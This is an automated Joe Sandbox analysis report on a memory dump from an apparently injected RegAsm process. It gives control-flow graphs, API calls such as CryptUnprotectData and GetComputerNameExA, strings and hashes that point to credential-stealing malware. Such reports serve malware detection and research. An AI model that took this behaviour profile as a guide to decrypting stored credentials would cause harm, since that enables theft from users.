                                                                                                        control_flow_graph 164 415799-4157cc call 408030 call 43e6e0 169 415850 164->169 170 4157d3-415800 call 408020 call 43e7d0 164->170 171 415852-415869 164->171 172 415842-415847 164->172 173 415807 164->173 174 415839-41583f call 408030 164->174 175 415818-41582c call 401000 164->175 169->171 170->169 170->171 170->172 170->173 170->174 170->175 179 415870-4158cb 171->179 172->169 173->175 174->172 175->174 179->179 183 4158cd-4158d5 179->183 185 4158d7-4158e6 183->185 186 41591a-41597b call 401a90 183->186 189 4158f0-4158f7 185->189 195 415980-4159b4 186->195 191 415900-415906 189->191 192 4158f9-4158fc 189->192 191->186 194 415908-415917 call 43c1f0 191->194 192->189 193 4158fe 192->193 193->186 194->186 195->195 197 4159b6-4159d3 call 401dd0 195->197 201 415d60 197->201 202 415bc6-415bcb 197->202 203 415d46-415d5f call 43dbf0 197->203 204 415d66 197->204 205 415d7a-415ddf 197->205 206 4159da-4159df 197->206 207 415d3d-415d43 call 408030 197->207 208 415d6c-415d78 call 408030 197->208 211 415bd0-415bd9 202->211 203->201 212 415de0-415dfa 205->212 213 4159e0-4159e6 206->213 207->203 208->205 211->211 218 415bdb-415be2 211->218 212->212 219 415dfc-415e16 call 401dd0 212->219 213->213 220 4159e8-415a07 213->220 221 415be4-415be9 218->221 222 415c06 218->222 219->201 219->202 219->203 219->204 219->205 219->207 219->208 224 415a09-415a0c 220->224 225 415a0e 220->225 226 415c09-415c4b call 408020 221->226 222->226 224->225 227 415a0f-415a28 224->227 225->227 235 415c50-415cb6 226->235 231 415a2a-415a2d 227->231 232 415a2f 227->232 231->232 234 415a30-415a4e call 408020 231->234 232->234 241 415a54-415a5b 234->241 242 415b59-415bbf call 43dbf0 CryptUnprotectData 234->242 235->235 237 415cb8-415cc7 235->237 239 415ce1-415cf8 237->239 240 415cc9-415ccf 237->240 244 415d21-415d37 call 408cb0 239->244 245 415cfa-415d01 239->245 243 415cd0-415cdf 240->243 246 415a80-415aca call 41dae0 * 2 241->246 242->201 242->202 242->203 242->204 242->205 242->207 242->208 243->239 243->243 244->207 248 415d10-415d1f 245->248 256 415a70-415a7a 246->256 257 415acc-415ae7 call 41dae0 246->257 248->244 248->248 256->242 256->246 257->256 260 415ae9-415b11 257->260 261 415a61-415a65 260->261 262 415b17-415b2d call 41dae0 260->262 261->256 265 415b33-415b54 262->265 266 415a5d 262->266 265->256 266->261
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                        • API String ID: 834300711-3328159043
                                                                                                        • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                        • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                        • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                        • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 267 409580-40958e 268 409aa4 267->268 269 409594-4095ff call 405ee0 call 408020 267->269 271 409aa6-409ab2 268->271 275 409600-409636 269->275 275->275 276 409638-40965f call 408f50 275->276 279 409660-4096af 276->279 279->279 280 4096b1-4096e3 call 408f50 279->280 283 4096f0-40975c 280->283 283->283 284 40975e-409794 call 408f50 283->284 287 4097a0-4097b0 284->287 287->287 288 4097b2-4097bf 287->288 289 4097c0-4097d4 288->289 289->289 290 4097d6-4097f6 call 408f50 289->290 293 409800-40985c 290->293 293->293 294 40985e-409932 call 4091b0 293->294 297 409940-409968 294->297 297->297 298 40996a-409972 297->298 299 409992-40999e 298->299 300 409974-40997f 298->300 302 4099a0-4099a3 299->302 303 4099c2-4099f2 299->303 301 409980-409990 300->301 301->299 301->301 304 4099b0-4099c0 302->304 305 409a00-409a5a 303->305 304->303 304->304 305->305 306 409a5c-409a78 call 40bbd0 305->306 308 409a7d-409aa2 call 408030 306->308 308->271
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #4<7$+8=>$E4BC9382A889E941AC8923850305D13E$PK$Tiec$\$r
                                                                                                        • API String ID: 0-3160728341
                                                                                                        • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                        • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                        • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                        • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 315 408850-408861 call 43bc60 318 408867-40888f call 408020 315->318 319 408acf-408ad1 ExitProcess 315->319 322 408890-4088cb 318->322 323 408904-408916 call 4354e0 322->323 324 4088cd-408902 322->324 327 408ab8-408abf 323->327 328 40891c-40893f GetCurrentProcessId GetCurrentThreadId 323->328 324->322 329 408ac1-408ac7 call 408030 327->329 330 408aca call 43c160 327->330 331 408941-408943 328->331 332 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 328->332 329->330 330->319 331->332 335 408a6b-408aac call 409b00 332->335 336 408a3d-408a69 332->336 335->327 340 408aae call 40c550 335->340 336->335 342 408ab3 call 40b390 340->342 342->327
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                        • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                          • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                        • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3072701918-0
                                                                                                        • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                        • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                        • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                        • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 344 42da53-42dab4 call 43dbf0 GetComputerNameExA 347 42dac0-42dadc 344->347 347->347 348 42dade-42dae8 347->348 349 42daea-42dafb 348->349 350 42db0d-42db10 348->350 351 42db00-42db09 349->351 352 42db17-42db24 350->352 351->351 353 42db0b 351->353 354 42db26-42db2f 352->354 355 42db3b-42db8f GetComputerNameExA 352->355 353->352 356 42db30-42db39 354->356 357 42db90-42dbf4 355->357 356->355 356->356 357->357 358 42dbf6-42dc00 357->358 359 42dc02-42dc0f 358->359 360 42dc1d 358->360 362 42dc10-42dc19 359->362 361 42dc20-42dc31 360->361 363 42dc33-42dc3a 361->363 364 42dc4b-42dc9a 361->364 362->362 365 42dc1b 362->365 366 42dc40-42dc49 363->366 368 42dca0-42dcba 364->368 365->361 366->364 366->366 368->368 369 42dcbc-42dcc6 368->369 370 42dcdb-42dce8 369->370 371 42dcc8-42dccf 369->371 373 42dcea-42dcf1 370->373 374 42dd0b-42dd66 call 43dbf0 370->374 372 42dcd0-42dcd9 371->372 372->370 372->372 375 42dd00-42dd09 373->375 379 42dd70-42dd8a 374->379 375->374 375->375 379->379 380 42dd8c-42dd96 379->380 381 42ddab-42ddbe 380->381 382 42dd98-42dd9f 380->382 384 42df04-42df43 381->384 385 42ddc4-42ddcf 381->385 383 42dda0-42dda9 382->383 383->381 383->383 387 42df50-42df68 384->387 386 42ddd0-42ddda 385->386 388 42ddf0-42ddf6 386->388 389 42dddc-42dde1 386->389 387->387 390 42df6a-42df76 387->390 392 42de20-42de2e 388->392 393 42ddf8-42ddfb 388->393 391 42deb0-42deb6 389->391 394 42df8b-42df8e call 430c70 390->394 395 42df78-42df7f 390->395 397 42deb8-42debe 391->397 400 42de34-42de37 392->400 401 42deca-42ded2 392->401 393->392 398 42ddfd-42de12 393->398 403 42df93-42dfaf 394->403 399 42df80-42df89 395->399 397->384 404 42dec0-42dec2 397->404 398->391 399->394 399->399 400->401 402 42de3d-42dea8 400->402 405 42ded4-42ded6 401->405 406 42ded8-42dedb 401->406 402->391 404->386 407 42dec8 404->407 405->397 408 42df00-42df02 406->408 409 42dedd-42defe 406->409 407->384 408->391 409->391
                                                                                                        APIs
                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DA87
                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DB5D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerName
                                                                                                        • String ID: 0K)$4*VP
                                                                                                        • API String ID: 3545744682-3626284114
                                                                                                        • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                        • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                        • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                        • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 410 4096c1 411 4096c8-4096e3 410->411 412 4096c3 call 408f50 410->412 413 4096f0-40975c 411->413 412->411 413->413 414 40975e-409794 call 408f50 413->414 417 4097a0-4097b0 414->417 417->417 418 4097b2-4097bf 417->418 419 4097c0-4097d4 418->419 419->419 420 4097d6-4097f6 call 408f50 419->420 423 409800-40985c 420->423 423->423 424 40985e-409932 call 4091b0 423->424 427 409940-409968 424->427 427->427 428 40996a-409972 427->428 429 409992-40999e 428->429 430 409974-40997f 428->430 432 4099a0-4099a3 429->432 433 4099c2-4099f2 429->433 431 409980-409990 430->431 431->429 431->431 434 4099b0-4099c0 432->434 435 409a00-409a5a 433->435 434->433 434->434 435->435 436 409a5c-409a78 call 40bbd0 435->436 438 409a7d-409ab2 call 408030 436->438
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\
                                                                                                        • API String ID: 0-3498454814
                                                                                                        • Opcode ID: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
                                                                                                        • Instruction ID: ec43dc8aada6c0e01d29c87bcd83570c0fdc998820d78b0374825785abd26213
                                                                                                        • Opcode Fuzzy Hash: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
                                                                                                        • Instruction Fuzzy Hash: 2BA1F2766087508BC718CF25C85266FBBE1ABC1318F18593DE5D6DB391D738C905CB8A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 448 43f720-43f72f 449 43f753-43f75c 448->449 450 43f731 448->450 452 43f763-43f781 449->452 453 43f75e-43f761 449->453 451 43f740-43f748 450->451 451->451 454 43f74a-43f74d 451->454 455 43f790-43f7b8 452->455 453->452 454->449 455->455 456 43f7ba-43f7cb 455->456 457 43f7d0-43f812 456->457 457->457 458 43f814-43f829 457->458 459 43f830-43f882 458->459 459->459 460 43f884-43f88f 459->460 461 43f891-43f899 460->461 462 43f8dd-43f8e9 460->462 463 43f8a0-43f8a7 461->463 464 43f8f0-43f918 462->464 465 43f8b0-43f8b6 463->465 466 43f8a9-43f8ac 463->466 464->464 467 43f91a-43f91d 464->467 465->462 469 43f8b8-43f8d3 call 43c1f0 465->469 466->463 468 43f8ae 466->468 470 43f923-43f94f call 43aa80 467->470 471 43fb2c-43fb35 467->471 468->462 474 43f8d8-43f8db 469->474 476 43f950-43f97f 470->476 474->462 476->476 477 43f981-43f996 476->477 478 43f9a0-43f9f3 477->478 478->478 479 43f9f5-43fa00 478->479 480 43fa02-43fa0a 479->480 481 43fa5e-43fa64 479->481 482 43fa10-43fa17 480->482 483 43fb20-43fb29 call 43aaa0 481->483 484 43fa6a-43fa70 481->484 485 43fa2b-43fa31 482->485 486 43fa19-43fa27 482->486 483->471 488 43fa72-43fa79 484->488 489 43fa7b-43fa80 484->489 485->481 491 43fa33-43fa54 call 43c1f0 485->491 486->482 490 43fa29 486->490 488->489 489->483 493 43fa86-43fa88 489->493 490->481 499 43fa59-43fa5c 491->499 495 43fb13-43fb1e 493->495 496 43fa8e-43fa9d 493->496 495->483 497 43faa1-43fae6 496->497 498 43fa9f 496->498 497->495 500 43fae8-43fafa 497->500 498->497 499->481 500->495 501 43fafc-43fb08 500->501 501->495 502 43fb0a-43fb0f 501->502 502->495
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: 1234$oQ3$sQ3
                                                                                                        • API String ID: 2994545307-3057079318
                                                                                                        • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                        • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                        • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                        • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 503 4218a0-42192a call 414400 call 43e340 508 421931-421984 call 4143e0 call 43aa80 503->508 509 42192c 503->509 515 421986-421989 508->515 510 4220f7-422104 509->510 516 4219e7-4219ed 515->516 517 42198b-4219e5 515->517 518 4219ef-4219fa 516->518 517->515 519 421a01-421a17 518->519 520 4219fc 518->520 522 421a19-421aa4 519->522 523 421a1e-421a29 519->523 521 421ab6-421ab9 520->521 527 421abb 521->527 528 421abd-421ac2 521->528 525 421aa6-421aaa 522->525 523->525 526 421a2b-421a95 call 43c1f0 523->526 530 421aae-421ab1 525->530 531 421aac 525->531 535 421a9a-421aa2 526->535 527->528 532 421ac8-421adb 528->532 533 421ff9-422028 call 43aaa0 528->533 530->518 531->521 536 421add-421b19 532->536 542 42202a-42202d 533->542 535->525 538 421b20-421b3d 536->538 539 421b1b 536->539 541 421b3f-421b42 538->541 540 421cde 539->540 547 421ce0-421ce4 540->547 543 421b44-421b9a 541->543 544 421b9c-421bbe call 422110 541->544 545 42208b-422090 542->545 546 42202f-422089 542->546 543->541 544->540 559 421bc4-421be9 544->559 549 422092-422098 545->549 546->542 550 421ce6-421cec 547->550 551 421cee-421d05 call 43aa80 547->551 553 42209a 549->553 554 42209c-4220ae 549->554 555 421d26-421d29 550->555 570 421d07-421d19 551->570 571 421d1e-421d24 551->571 553->510 560 4220b2-4220b8 554->560 561 4220b0 554->561 557 421fd3-421fd8 555->557 558 421d2f-421d4f 555->558 565 421fe3-421fe9 557->565 566 421fda-421fe1 557->566 563 421d51-421d54 558->563 564 421beb-421bee 559->564 568 4220ba 560->568 569 4220bc-4220e8 call 43c1f0 560->569 567 4220eb-4220ee 561->567 573 421d93-421db6 563->573 574 421d56-421d91 563->574 575 421bf0-421c0a 564->575 576 421c0c-421c2d call 422110 564->576 577 421feb 565->577 566->577 579 4220f2-4220f5 567->579 580 4220f0 567->580 568->567 569->567 572 421fed-421fef 570->572 571->555 572->536 583 421ff5-421ff7 572->583 581 421db8-421dbb 573->581 574->563 575->564 590 421c34-421c4b 576->590 591 421c2f 576->591 577->572 579->549 580->510 585 421e19-421e1c 581->585 586 421dbd-421e17 581->586 583->533 589 421e1e-421e29 585->589 586->581 592 421e30-421e46 589->592 593 421e2b 589->593 594 421c4f-421cdc call 408020 call 414050 call 408030 590->594 595 421c4d 590->595 591->547 598 421e48-421ed2 592->598 599 421e4d-421e58 592->599 597 421ee4-421eea 593->597 594->547 595->594 601 421eee-421f0b 597->601 602 421eec 597->602 604 421ed4-421ed8 598->604 599->604 605 421e5a-421ec3 call 43c1f0 599->605 609 421f0d-421f10 601->609 602->601 607 421eda 604->607 608 421edc-421edf 604->608 611 421ec8-421ed0 605->611 607->597 608->589 613 421f12-421f66 609->613 614 421f68-421f6f 609->614 611->604 613->609 615 421f71-421f75 614->615 616 421f9f-421fa2 614->616 620 421f77-421f7e 615->620 617 421fa4-421fbd call 43aaa0 616->617 618 421fbf-421fc4 616->618 622 421fc6-421fc9 617->622 618->622 624 421f80-421f8c 620->624 625 421f8e-421f91 620->625 622->557 627 421fcb-421fd1 622->627 624->620 629 421f93-421f99 625->629 630 421f9b-421f9d 625->630 627->572 629->630 630->616
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !@$,
                                                                                                        • API String ID: 0-2321553346
                                                                                                        • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                        • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                                                                                        • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                        • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                                                                                        APIs
                                                                                                        • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,+*)
                                                                                                        • API String ID: 0-3529585375
                                                                                                        • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                        • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                        • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                        • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: o`
                                                                                                        • API String ID: 0-3993896143
                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                        • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                        • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                        • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                                                                                        • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                        • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                        • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                                                                        • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                                                                        • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 632 433cdf-433d6a GetSystemMetrics * 2 636 433d71-433d86 632->636
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 4116985748-0
                                                                                                        • Opcode ID: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
                                                                                                        • Instruction ID: cb1e3e37586d9a4509bd606a09fc72fdf1ec5b4aeb0744265bd1e649f6a723a7
                                                                                                        • Opcode Fuzzy Hash: 5f2d3bb2bc73d9fb24c3e71e22e052d5e824def969419b7e1f909697d2eb3c0f
                                                                                                        • Instruction Fuzzy Hash: 2211AFF4D142188FDB40EF7CD98569DBBF4AB49304F10442AE498E7360E774A9988F86
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
                                                                                                        • Instruction ID: bada183498579cd0d1e1b9560e2ec57dcdd73a114042e6aef25e130bccfe5e33
                                                                                                        • Opcode Fuzzy Hash: d676d3cf378bce22c63fcc0d702ca03e1329d21923194e356a21209e6313a188
                                                                                                        • Instruction Fuzzy Hash: C721297251C39089D735CB368810BEBBBE29FD6308F49CCADC4C847242E7794585C79A
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ForegroundWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2020703349-0
                                                                                                        • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                        • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                        • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                        • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                                                                        APIs
                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                        • Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
                                                                                                        • Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                        • Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
